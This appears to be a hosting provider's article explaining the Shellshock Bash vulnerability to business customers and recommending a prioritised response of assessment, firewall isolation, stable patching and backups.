The presence of a critical security vulnerability in Bash is now well known, but how are business users of hosting services affected, and what is the appropriate response from providers?
By now you are probably aware of the critical security vulnerability, known as 'Shellshock' or 'Bash Door', discovered in Bash, the shell component of almost all Linux and Unix derived operating systems. Much has been written already about Shellshock and its potential effects, but what is the impact in the hosting environment and what should hosting providers be doing in response?
Shellshock, the business perspective
As has been written by many, Shellshock is considered even more hazardous than the recent Heartbleed crisis, in which the OpenSSL protocol was compromised, since it gives the attacker full control of the compromised machine, allowing them to do much more than only steal data.
Another factor in the high threat assessment is the potential reach. Bash, the command processing Unix shell, is the default shell shipped with all Linux and Unix operating systems. While these operating systems are not particularly prevalent in home computers, they are extremely common in networking devices (both domestic and commercial) and throughout the datacentre environment thanks in part to attractive cost positions and historic reliability.
In fact, it can be said that the majority of the internet is built on Linux. Web, database, DNS, Radius and many more integral server types are all common applications for the Bash-carrying operating system, meaning that many business critical servers are at risk.
The issue is exacerbated by the fact that many Linux users think of the OS as unsusceptible to attack and thus neglect to perform basic security measures.
It's worth mentioning at this point that although Mac OS X machines do carry the vulnerable Bash component, the threat to these machines is low due the way in which they use it. Also, Bash should not be confused with the Command Prompt synonymous with Windows operating systems - though they look same, they are not. Windows machines are, for once, not affected.
Probable impact of being compromised
The possible uses of the Shellshock vulnerability are wide ranging but the likely candidates are personal data theft, use in DDoS attack botnets, sending of SPAM email and attacking more machines via Shellshock. The challenge is that you may not know your machine is compromised as Shellshock gives already sophisticated criminals full control of your machine, allowing them to cover their tracks.
A more recent development has seen exploits like this one being used to create bitcoin mining rigs. However, since mining bitcoin is extremely resource intensive this is likely to be both limited to extremely powerful servers and easily spotted by system administrators when it occurs.
Should we scramble to patch?
Media advice would, on the whole, have us, the hosting provider, and you, the user, scrambling to patch every bit of vulnerable kit we can find as fast as possible. In truth however, this probably isn't the most sensible solution for three reasons:
- The patches that have so far been released have been developed in haste. Several prominent examples were quickly superseded or withdrawn while more effective solutions were developed. Expending effort applying patches before they are robust is a waste of your time and money
- In addition, many of the devices that are vulnerable cannot be patched. Mainly this is due to the age of the bug and the number of unsupported or end-of-life products in service. As a result, patching only can never offer a complete solution
- Devices are only vulnerable if they are accessible from the internet and many of the un-patchable devices, older printers for example, often don’t need internet access. Thus, the threat to them can be eliminated with proper network security measures.
So, what is the right response?
Our advice to you is to first assess your infrastructure to identify the risks and then build a prioritised plan to protect the business.
Steps we are offering to help all our customers perform include:
- Reviewing network diagrams and testing devices to identify the vulnerabilities within your infrastructure
- Implementing firewall policies to isolate devices that don’t need internet access
- Configuring software to run anti-virus and anti-malware checks
- Applying stable patches to devices still vulnerable to attack
As always, backup is your trump card
As it is in most situations, having an appropriate backup strategy in place ensures that, even if the worst happens, you can recover critical data and resume operations quickly. If you don’t have a backup strategy, you are really are leaving yourself vulnerable to significant disruption from hackers exploiting security holes like Shellshock.